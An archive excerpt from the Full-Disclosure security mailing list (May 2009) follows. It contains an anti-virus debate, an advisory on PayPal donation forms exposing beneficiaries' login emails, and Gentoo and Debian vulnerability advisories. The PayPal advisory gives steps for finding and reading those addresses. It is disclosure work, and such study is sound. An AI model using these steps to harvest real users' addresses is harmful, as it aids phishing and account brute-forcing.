servers In-Reply-To: <20090501142903.BBD.0@paddy.troja.mff.cuni.cz> References: <2d6724810904291229k2990e62al94cdd95f6ee040b7@mail.gmail.com> <20090501142903.BBD.0@paddy.troja.mff.cuni.cz> Message-ID: <2d6724810905011052o2259e313q75c06d84ac14015a@mail.gmail.com> The example provides an easy to concoct scenario where perhaps anti-virus software might be employed to great benefit where the actual OS's security would be a moot point. A sort of catalyst for expanding VK's ability to consider the other side of the argument, by not handing this to him on a silver platter I give him the opportunity to grow as a person. Thank you for ruining this. It's interesting to see that so many on this list have become so hypnotized that they would go so far to say that A/V is useless and the only possible protection is switching to some other OS. They are the definition of idealist and cannot see past their own rhetoric, unable to consider any other possible scenario, or look at a problem from a broader perspective. Let me address your point directly, you obviously share the same delusions: Being so generic it is possible to concoct a situation in the above framework wherein A/V would not be applicable. Pointing this out has no bearing on my argument. It is equally obvious to point to an example when, yes, an A/V (however deployed) would provide a worthwhile added value to the user experience, this point is sufficient for winning the debate. -Travis On Fri, May 1, 2009 at 8:38 AM, Pavel Kankovsky wrote: > On Wed, 29 Apr 2009, T Biehn wrote: > >> What do you suggest to use on a server that must accept uploads of >> binaries from users? >> Should these binaries be scanned by an anti-virus? Can we trust that >> end users have competent Anti-Virus? > > This question is a kind of non-sequitur because you have not told us > what kind of binaries are uploaded, where do they come from, what is > the server supposed to do with them. > > Let me fill the gaps myself for the sake of demonstration: Users compile > their own programs for some obscure kind of embedded computer and upload > the resulting binaries to a server that is supposed to archive them for > future reference. Should these binaries be scanned by an anti-virus? > What do you think? > > -- > Pavel Kankovsky aka Peak ? ? ? ? ? ? ? ? ? ? ? ? ?/ Jeremiah 9:21 ? ? ? ?\ > "For death is come up into our MS Windows(tm)..." \ 21th century edition / > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From eitancaspi at yahoo.com Fri May 1 20:27:59 2009 From: eitancaspi at yahoo.com (Eitan Caspi) Date: Fri, 1 May 2009 12:27:59 -0700 (PDT) Subject: [Full-disclosure] PayPal donation form reveals beneficiary's email address Message-ID: <354222.61430.qm@web53906.mail.re2.yahoo.com> Suggested severity level: Low-to-Medium. Type of Risk: Information Disclosure (PayPal account authentication (partial) and private email address). Local / Remote activated: Remote. Affected Software: PayPal web site, Donation form. Access was tested and verified using Internet Explorer 8.0, Firefox 3.0.10 and Opera 9.64. Summary: By clicking a recent version (so I believe, I can't trace and test various versions) of a PayPal Donation button, the beneficiary's primary email address is displayed in the header of the donation form, and of course, in the form's source code. This email address is also the one used by the beneficiary to login into its account in PayPal and manage it operatively and financially. The email address is displayed although in the process of creating the donation button ? PayPal enable to choose an option to hide the email address, and this option is not working even if used (see the following "Self Reproduction" section for details). Possible Abuses: Phishers may use the beneficiary's email address to send him/her an attack email to try and break into this person's PayPal account using a phishing email and a malicious web page. Other attackers can simply use the email address to brute force the beneficiary's PayPal account since the PayPal authentication is based on two values ? the beneficiary's email address and a password, so now only the password is the unknown. Spammers may simply harvest the beneficiary's email address to add it to the list of their spamming targets. Reproduction: 1. Perform a search of any newly created donation buttons on web sites. For example search using Google for "donate via PayPal" or "donate using PayPal" pages indexed by Google in the last month (you may also try this queries without time limitation, it may also work): a. http://www.google.com/search?hl=en&lr=&safe=off&rlz=1B3GGGL_enIL269IL269&q=%22donate+via+paypal%22&as_qdr=m&btnG=Search b. http://www.google.com/search?hl=en&lr=&safe=off&rlz=1B3GGGL_enIL269IL269&q=%22donate+using+paypal%22&as_qdr=m&btnG=Search 2. Find in the search results sites which ask for a donation and click any link that leads to such site. 3. At the donation request page you landed at ? click the donation button or link (If you use the Firefox security add-on "NoScript" (http://noscript.net) ? turn it off (or temporary allow the beneficiary's site) before clicking the PayPal button or link, or you will be redirected away from the donation form to a main PayPal page). Prefer pages with a more recent donation icons originated from https://www.paypal.com/en_US/i/btn/btn_donateCC_LG.gif (with logos of credit card firms) or https://www.paypal.com/en_US/i/btn/btn_donate_LG.gif (without the credit card firms logos(. 4. Read the beneficiary's primary email address at the top of the donation form in PayPal (located in the "h1" section of the HTML code of the form). Self Reproduction (making your own button and clicking it): 1. Create a PayPal account at https://www.paypal.com/us/cgi-bin/webscr?cmd=_registration-run . A "Personal" account type will do. 2. After completing the creation of your account at PayPal, browse to a page made for creating the donation button - https://www.paypal.com/cgi-bin/webscr?cmd=_button-designer&factory_type=donate . 3. At this page, at the "Email address to receive payments" field, click the "Log in" link. You will go via the regular PayPal authentication process and then will be redirected back to the button creation page, this time as an authenticated PayPal customer. 4. In the "Merchant ID for purchase transactions" field choose the option of "Secure merchant account ID". Next to this field there will be a link titled "Why is this secure?" (https://www.paypal.com/il/cgi-bin/webscr?cmd=xpt/Merchant/popup/BDSecureMerchantId) which states: "A secure merchant account ID is a number that only PayPal can match to your real email address in your profile. Your primary e-mail address is never displayed, so it cannot be used by spammers. If you choose a plain text e-mail address, however, it will be displayed in the button code. Anyone, including spammers, can copy this address for their own use." 5. Click "Create Button" and then copy the code created for the donation button and place it as part of the HTML code of any web page you own. 6. Load the web page you just created to be displayed using a web browser and click the "Donate" button (see the above note about "NoScript"). You will be directed to the PayPal donation form where you will be able to read the primary email address of your PayPal account on the top of form (located in the "h1" section of the HTML code of the form). Exploit Code: There is no need for an exploit code. Direct solution: Not any that I am aware of at the time of writing this advisory. I guess the solution can only be made by PayPal since its their web site form. Workarounds: Not any that I am aware of at the time of writing this advisory. I can only advise PayPal donation users to stop using the donation button until PayPal solves this issue, and thus to remove any PayPal donation buttons and links from their site until this issue is fixed. Vendor response: PayPal was notified by email on the 25-April-2009 (sitesecurity at paypal.com , found at https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/cps/securitycenter/general/ReportingSecurityIssues-outside). Two days later, after some email exchange, the following final response was given by PayPal: " I?ve discussed with the product team and there is probably some language cleanup needed on the signup forms. The intent of the feature is not to prevent showing the email address during a payment flow, but to prevent the harvesting of the email address from the site hosting the donation button. The bug, if any, is in the language describing the feature not in the feature itself. Thank you for bringing it to our attention. The product team is filing a change request to adjust the language and make it clearer. " So the mentioned above security option is for making a more secure button code for the beneficiary's web site, but still PayPal did not answer about the issue of their own form exposing the beneficiary's email address at their own web site. Credit: Eitan Caspi Israel Email: eitancaspi (at) yahoo (dot) com Past security advisories: 1. http://www.microsoft.com/technet/security/bulletin/MS02-003.mspx http://support.microsoft.com/kb/315085/en-us http://online.securityfocus.com/bid/4053 2. http://support.microsoft.com/?kbid=329350 http://online.securityfocus.com/bid/5972 3. http://www.securityfocus.com/archive/1/301624 http://online.securityfocus.com/bid/6280 4. http://online.securityfocus.com/archive/1/309442 http://online.securityfocus.com/bid/6736 5. http://www.securityfocus.com/archive/1/314361 http://www.securityfocus.com/bid/7046 6. http://www.securityfocus.com/archive/1/393800 7. http://www.securityfocus.com/archive/1/archive/1/434704/100/0/threaded 8. http://www.securityfocus.com/archive/1/archive/1/446220/100/0/ 9. http://www.securityfocus.com/archive/1/459140/30/90/threaded http://www.securityfocus.com/bid/22413 10. http://www.securityfocus.com/archive/1/460664/30/60/threaded 11. http://www.securityfocus.com/archive/1/472216/30/0/threaded Eitan Caspi Israel Security blogs (Hebrew) - http://security.caspi.org.il "Technology is like sex. No hands on - No fun." (Eitan Caspi) Get your new Email address! Grab the Email name you've always wanted before someone else does! http://mail.promotions.yahoo.com/newdomains/aa/ From postmaster at boxbe.com Sat May 2 12:00:47 2009 From: postmaster at boxbe.com (postmaster at boxbe.com) Date: Sat, 2 May 2009 04:00:47 -0700 (PDT) Subject: [Full-disclosure] Full-Disclosure Digest, Vol 51, Issue 2 (Action Required) Message-ID: <735023371.2246.1241262047755.JavaMail.prod@app003.boxbe.com> Dear sender, You just sent me an email about "Full-Disclosure Digest, Vol 51, Issue 2". I'll be more likely to see your email and future messages if you are on my priority Guest List. Click the link below to be put directly on my Guest List: https://www.boxbe.com/crs?tc=71695621_302899058 Thank you, jakob.flygare at gmail.com About Boxbe This courtesy notice is part of a free service to make email more reliable and useful. Boxbe (http://www.boxbe.com) uses your existing social network and that of your friends to keep your inbox clean and make sure you receive email from people who matter to you. Boxbe: Say Goodbye to Email Overload Visit http://www.boxbe.com/how-it-works?tc=71695621_302899058 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090502/a884a062/attachment.html -------------- next part -------------- An embedded message was scrubbed... From: full-disclosure-request at lists.grok.org.uk Subject: Full-Disclosure Digest, Vol 51, Issue 2 Date: Sat, 02 May 2009 12:00:01 +0100 Size: 2206 Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090502/a884a062/attachment.mht From bits_n_bytes at gmx.de Sat May 2 18:49:56 2009 From: bits_n_bytes at gmx.de (Frank Dietrich) Date: Sat, 2 May 2009 19:49:56 +0200 Subject: [Full-disclosure] PayPal donation form reveals beneficiary's email address In-Reply-To: <354222.61430.qm@web53906.mail.re2.yahoo.com> References: <354222.61430.qm@web53906.mail.re2.yahoo.com> Message-ID: <20090502194956.74a11cd3@example.com> Hi Eitan, Eitan Caspi wrote: >3. At the donation request page you landed at ? click the donation >button ... >[...] >4. Read the beneficiary's primary email address at the top of the >donation form in PayPal (located in the "h1" section of the HTML >code of the form). May be not true for every paypal donation form. If you click on following site on the doante button http://www.art-stream.org/donate.php#donate-now there is no email address in the page source. Or I don't get the point. regards Frank -- From rbu at gentoo.org Sat May 2 18:54:49 2009 From: rbu at gentoo.org (Robert Buchholz) Date: Sat, 2 May 2009 19:54:49 +0200 Subject: [Full-disclosure] [ GLSA 200905-01 ] Asterisk: Multiple vulnerabilities Message-ID: <200905021954.55063.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200905-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Asterisk: Multiple vulnerabilities Date: May 02, 2009 Bugs: #218966, #224835, #232696, #232698, #237476, #250748, #254304 ID: 200905-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Asterisk allowing for Denial of Service and username disclosure. Background ========== Asterisk is an open source telephony engine and toolkit. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/asterisk < 1.2.32 >= 1.2.32 Description =========== Multiple vulnerabilities have been discovered in the IAX2 channel driver when performing the 3-way handshake (CVE-2008-1897), when handling a large number of POKE requests (CVE-2008-3263), when handling authentication attempts (CVE-2008-5558) and when handling firmware download (FWDOWNL) requests (CVE-2008-3264). Asterisk does also not correctly handle SIP INVITE messages that lack a "From" header (CVE-2008-2119), and responds differently to a failed login attempt depending on whether the user account exists (CVE-2008-3903, CVE-2009-0041). Impact ====== Remote unauthenticated attackers could send specially crafted data to Asterisk, possibly resulting in a Denial of Service via a daemon crash, call-number exhaustion, CPU or traffic consumption. Remote unauthenticated attackers could furthermore enumerate valid usernames to facilitate brute force login attempts. Workaround ========== There is no known workaround at this time. Resolution ========== All Asterisk users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/asterisk-1.2.32" References ========== [ 1 ] CVE-2008-1897 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1897 [ 2 ] CVE-2008-2119 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2119 [ 3 ] CVE-2008-3263 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3263 [ 4 ] CVE-2008-3264 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3264 [ 5 ] CVE-2008-3903 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3903 [ 6 ] CVE-2008-5558 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5558 [ 7 ] CVE-2009-0041 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0041 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200905-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 836 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090502/905a68de/attachment.bin From eitancaspi at yahoo.com Sat May 2 20:52:21 2009 From: eitancaspi at yahoo.com (Eitan Caspi) Date: Sat, 2 May 2009 22:52:21 +0300 Subject: [Full-disclosure] PayPal donation form reveals beneficiary's email address In-Reply-To: <20090502194956.74a11cd3@example.com> References: <354222.61430.qm@web53906.mail.re2.yahoo.com> <20090502194956.74a11cd3@example.com> Message-ID: <005a01c9cb5f$82fcd870$88f68950$@com> I agree Frank, and so I wrote "By clicking a recent version (so I believe, I can't trace and test various versions) of a PayPal Donation button...". It doesn't happen in ALL of the donation buttons. I also believe this happens mostly in button codes created by the PayPal site and less or at all in donation buttons/forms manually created by the beneficiary at its own site, and I think the site you linked to is made just with this kind of manual code. Eitan -----Original Message----- From: Frank Dietrich [mailto:bits_n_bytes at gmx.de] Sent: Saturday, May 02, 2009 8:50 PM To: full-disclosure at lists.grok.org.uk Cc: eitancaspi at yahoo.com Subject: Re: [Full-disclosure] PayPal donation form reveals beneficiary's email address Hi Eitan, Eitan Caspi wrote: >3. At the donation request page you landed at click the donation >button ... >[...] >4. Read the beneficiary's primary email address at the top of the >donation form in PayPal (located in the "h1" section of the HTML >code of the form). May be not true for every paypal donation form. If you click on following site on the doante button http://www.art-stream.org/donate.php#donate-now there is no email address in the page source. Or I don't get the point. regards Frank -- From peak at argo.troja.mff.cuni.cz Sun May 3 00:41:08 2009 From: peak at argo.troja.mff.cuni.cz (Pavel Kankovsky) Date: Sun, 3 May 2009 01:41:08 +0200 (CEST) Subject: [Full-disclosure] Anti virus installations on Windows servers In-Reply-To: <2d6724810905011052o2259e313q75c06d84ac14015a@mail.gmail.com> Message-ID: <20090502153024.BBD.0@paddy.troja.mff.cuni.cz> On Fri, 1 May 2009, T Biehn wrote: > The example provides an easy to concoct scenario where perhaps > anti-virus software might be employed to great benefit where the > actual OS's security would be a moot point. Very unlikely. If your OS has got more holes than a piece of Emmentaler malicious code might exploit one of them to circumvent or disable detection even before your antivirus gets a chance to scan it. You lose. Game over. > It's interesting to see that so many on this list have become so > hypnotized that they would go so far to say that A/V is useless and > the only possible protection is switching to some other OS. Let me check: Can antivirus prevent an arbitrary piece of malware from causing harm? No--it is impossible even in theory (see Rice's theorem). Can OS with a strict MAC policy prevent an arbitrary piece of malware from causing harm? Yes--it is not easy but it is certainly possible. > It is equally obvious to point to an example when, yes, an A/V > (however deployed) would provide a worthwhile added value to the user > experience, this point is sufficient for winning the debate. Primo: "A worthwhile added value" might be very far from "optimal". Secundo: Does "however deployed" includes "defunct"? Tertio: User experience?! -- Pavel Kankovsky aka Peak / Jeremiah 9:21 \ "For death is come up into our MS Windows(tm)..." \ 21th century edition / From ghosts at gmail.com Sun May 3 04:02:23 2009 From: ghosts at gmail.com (ghost) Date: Sat, 2 May 2009 23:02:23 -0400 Subject: [Full-disclosure] PayPal donation form reveals beneficiary's email address In-Reply-To: <005a01c9cb5f$82fcd870$88f68950$@com> References: <354222.61430.qm@web53906.mail.re2.yahoo.com> <20090502194956.74a11cd3@example.com> <005a01c9cb5f$82fcd870$88f68950$@com> Message-ID: <6f4bb0b50905022002i87aed56n707963eeb3fc0b4c@mail.gmail.com> You wrote a security advisory with 11 references which you provided on the bottom simply to say... paypal leaks your e-mail address. The security industry is not for you, go back to checkers. On Sat, May 2, 2009 at 3:52 PM, Eitan Caspi wrote: > I agree Frank, and so I wrote "By clicking a recent version (so I believe, I can't trace and test various versions) of a PayPal Donation button...". > > It doesn't happen in ALL of the donation buttons. I also believe this happens mostly in button codes created by the PayPal site and less or at all in donation buttons/forms manually created by the beneficiary at its own site, and I think the site you linked to is made just with this kind of manual code. > > Eitan > > -----Original Message----- > From: Frank Dietrich [mailto:bits_n_bytes at gmx.de] > Sent: Saturday, May 02, 2009 8:50 PM > To: full-disclosure at lists.grok.org.uk > Cc: eitancaspi at yahoo.com > Subject: Re: [Full-disclosure] PayPal donation form reveals beneficiary's email address > > Hi Eitan, > > Eitan Caspi wrote: >>3. At the donation request page you landed at ?click the donation >>button ... >>[...] >>4. Read the beneficiary's primary email address at the top of the >>donation form in PayPal (located in the "h1" section of the HTML >>code of the form). > > May be not true for every paypal donation form. > If you click on following site on the doante button > ?http://www.art-stream.org/donate.php#donate-now > there is no email address in the page source. > Or I don't get the point. > > regards > Frank > -- > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From dannf at debian.org Sat May 2 19:33:03 2009 From: dannf at debian.org (dann frazier) Date: Sat, 2 May 2009 12:33:03 -0600 Subject: [Full-disclosure] [SECURITY] [DSA 1787-1] New Linux 2.6.24 packages fix several vulnerabilities Message-ID: <20090502183302.GF4725@ldl.fc.hp.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------------------------- Debian Security Advisory DSA-1787-1 security at debian.org http://www.debian.org/security/ Dann Frazier May 2, 2009 http://www.debian.org/security/faq - ---------------------------------------------------------------------- Package : linux-2.6.24 Vulnerability : denial of service/privilege escalation/information leak Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2008-4307 CVE-2008-5079 CVE-2008-5395 CVE-2008-5700 CVE-2008-5701 CVE-2008-5702 CVE-2009-0028 CVE-2009-0029 CVE-2009-0031 CVE-2009-0065 CVE-2009-0269 CVE-2009-0322 CVE-2009-0675 CVE-2009-0676 CVE-2009-0745 CVE-2009-0834 CVE-2009-0859 CVE-2009-1046 CVE-2009-1192 CVE-2009-1242 CVE-2009-1265 CVE-2009-1337 CVE-2009-1338 CVE-2009-1439 Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or privilege escalation. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-4307 Bryn M. Reeves reported a denial of service in the NFS filesystem. Local users can trigger a kernel BUG() due to a race condition in the do_setlk function. CVE-2008-5079 Hugo Dias reported a DoS condition in the ATM subsystem that can be triggered by a local user by calling the svc_listen function twice on the same socket and reading /proc/net/atm/*vc. CVE-2008-5395 Helge Deller discovered a denial of service condition that allows local users on PA-RISC systems to crash a system by attempting to unwind a stack contiaining userspace addresses. CVE-2008-5700 Alan Cox discovered a lack of minimum timeouts on SG_IO requests, which allows local users of systems using ATA to cause a denial of service by forcing drives into PIO mode. CVE-2008-5701 Vlad Malov reported an issue on 64-bit MIPS systems where a local user could cause a system crash by crafing a malicious binary which makes o32 syscalls with a number less than 4000. CVE-2008-5702 Zvonimir Rakamaric reported an off-by-one error in the ib700wdt watchdog driver which allows local users to cause a buffer underflow by making a specially crafted WDIOC_SETTIMEOUT ioctl call. CVE-2009-0028 Chris Evans discovered a situation in which a child process can send an arbitrary signal to its parent. CVE-2009-0029 Christian Borntraeger discovered an issue effecting the alpha, mips, powerpc, s390 and sparc64 architectures that allows local users to cause a denial of service or potentially gain elevated privileges. CVE-2009-0031 Vegard Nossum discovered a memory leak in the keyctl subsystem that allows local users to cause a denial of service by consuming all of kernel memory. CVE-2009-0065 Wei Yongjun discovered a memory overflow in the SCTP implementation that can be triggered by remote users, permitting remote code execution. CVE-2009-0269 Duane Griffin provided a fix for an issue in the eCryptfs subsystem which allows local users to cause a denial of service (fault or memory corruption). CVE-2009-0322 Pavel Roskin provided a fix for an issue in the dell_rbu driver that allows a local user to cause a denial of service (oops) by reading 0 byts from a sysfs entry. CVE-2009-0675 Roel Kluin discovered inverted logic in the skfddi driver that permits local, unprivileged users to reset the driver statistics. CVE-2009-0676 Clement LECIGNE discovered a bug in the sock_getsockopt function that may result in leaking sensitive kernel memory. CVE-2009-0745 Peter Kerwien discovered an issue in the ext4 filesystem that allows local users to cause a denial of service (kernel oops) during a resize operation. CVE-2009-0834 Roland McGrath discovered an issue on amd64 kernels that allows local users to circumvent system call audit configurations which filter based on the syscall numbers or argument details. CVE-2009-0859 Jiri Olsa discovered that a local user can cause a denial of service (system hang) using a SHM_INFO shmctl call on kernels compiled with CONFIG_SHMEM disabled. This issue does not affect prebuilt Debian kernels. CVE-2009-1046 Mikulas Patocka reported an issue in the console subsystem that allows a local user to cause memory corruption by selecting a small number of 3-byte UTF-8 characters. CVE-2009-1192 Shaohua Li reported an issue in the AGP subsystem they may allow local users to read sensitive kernel memory due to a leak of uninitialized memory. CVE-2009-1242 Benjamin Gilbert reported a local denial of service vulnerability in the KVM VMX implementation that allows local users to trigger an oops. CVE-2009-1265 Thomas Pollet reported an overflow in the af_rose implementation that allows remote attackers to retrieve uninitialized kernel memory that may contain sensitive data. CVE-2009-1337 Oleg Nesterov discovered an issue in the exit_notify function that allows local users to send an arbitrary signal to a process by running a program that modifies the exit_signal field and then uses an exec system call to launch a setuid application. CVE-2009-1338 Daniel Hokka Zakrisson discovered that a kill(-1) is permitted to reach processes outside of the current process namespace. CVE-2009-1439 Pavan Naregundi reported an issue in the CIFS filesystem code that allows remote users to overwrite memory via a long nativeFileSystem field in a Tree Connect response during mount. For the stable distribution (etch), these problems have been fixed in version 2.6.24-6~etchnhalf.8etch1. We recommend that you upgrade your linux-2.6.24 packages. Note: Debian 'etch' includes linux kernel packages based upon both the 2.6.18 and 2.6.24 linux releases. All known security issues are carefully tracked against both packages and both packages will receive security updates until security support for Debian 'etch' concludes. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, lower severity 2.6.18 and 2.6.24 updates will typically release in a staggered or "leap-frog" fashion. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.8etch1.diff.gz Size/MD5 checksum: 4033829 ff5f9342fbd061dcab316080057bf9ac http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.8etch1.dsc Size/MD5 checksum: 5117 c71acfa6a187429a702d368e5974d082 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af Architecture independent packages: http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb Size/MD5 checksum: 82422 f39c24b3acf13eee80ab07421e120bc7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb Size/MD5 checksum: 4260850 8b0891fa602714572b2ea8be13d4b2eb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.8etch1_all.deb Size/MD5 checksum: 96802 317936645be453126afab54705999059 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb Size/MD5 checksum: 1542086 460bc638a040b2674f4da6e30fc975f1 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb Size/MD5 checksum: 46865722 b3afc19906294f1990ab97e6c8943285 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb Size/MD5 checksum: 917482 dc533207197184a44dcc931372534b0b alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.8etch1_alpha.deb Size/MD5 checksum: 82038 12269f5ccc3251bed6544c82ace6bab8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.8etch1_alpha.deb Size/MD5 checksum: 26736698 8714134f74ad24d4a761d9e1b18c84dc http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.8etch1_alpha.deb Size/MD5 checksum: 332080 2632341b6c0d98b6798103d4e03a4980 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.8etch1_alpha.deb Size/MD5 checksum: 26757530 c00a3280cf8bc9d18e52c64202af9e34 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.8etch1_alpha.deb Size/MD5 checksum: 27341904 ee355aab70b9061c511e7152929c150a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.8etch1_alpha.deb Size/MD5 checksum: 331054 7d30fb320e409180de47bdf7be8430c2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_alpha.deb Size/MD5 checksum: 3454072 01417e58c71bb9515a4011c390be0580 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_alpha.deb Size/MD5 checksum: 82010 cff77bfb7491d357acc7d9d50dc0217e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.8etch1_alpha.deb Size/MD5 checksum: 330926 1b2c38a3628e25cc62b7e555800d48e5 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch1_amd64.deb Size/MD5 checksum: 19480638 9f9f06adb37a611ed3f24000859beb03 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_amd64.deb Size/MD5 checksum: 3654580 aac989a8eee05d7adaf9731dfdda062f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch1_amd64.deb Size/MD5 checksum: 344960 4a6f4ac493086ec243734b3b6968a2bd http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.8etch1_amd64.deb Size/MD5 checksum: 82010 f7713fceebf11933dd20c7db1c636df0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_amd64.deb Size/MD5 checksum: 81998 7f2d31a9d80ae34c397d90912dbbb46f arm architecture (ARM) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.8etch1_arm.deb Size/MD5 checksum: 308926 05539199c8e837c4fccc75172a9c82be http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_arm.deb Size/MD5 checksum: 82136 39e67aa9c8617379a54c9f36d0d72572 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_arm.deb Size/MD5 checksum: 3939598 804e621a444954f2045f27a9282ae77a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.8etch1_arm.deb Size/MD5 checksum: 306808 3086d994c254c2481c6610729c6ee182 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.8etch1_arm.deb Size/MD5 checksum: 296510 23d73ccad75398f169ad602db513b908 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.8etch1_arm.deb Size/MD5 checksum: 9351566 c0326566806f5c7ed8de2342f4de857a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.8etch1_arm.deb Size/MD5 checksum: 10775966 6661bd851503d953c4ca43b6f8e85deb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.8etch1_arm.deb Size/MD5 checksum: 10768304 daca396e0f5decdfe92a7724069daa50 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.8etch1_arm.deb Size/MD5 checksum: 82166 8bb034ce3157aeefe7c3c692ebe14df4 hppa architecture 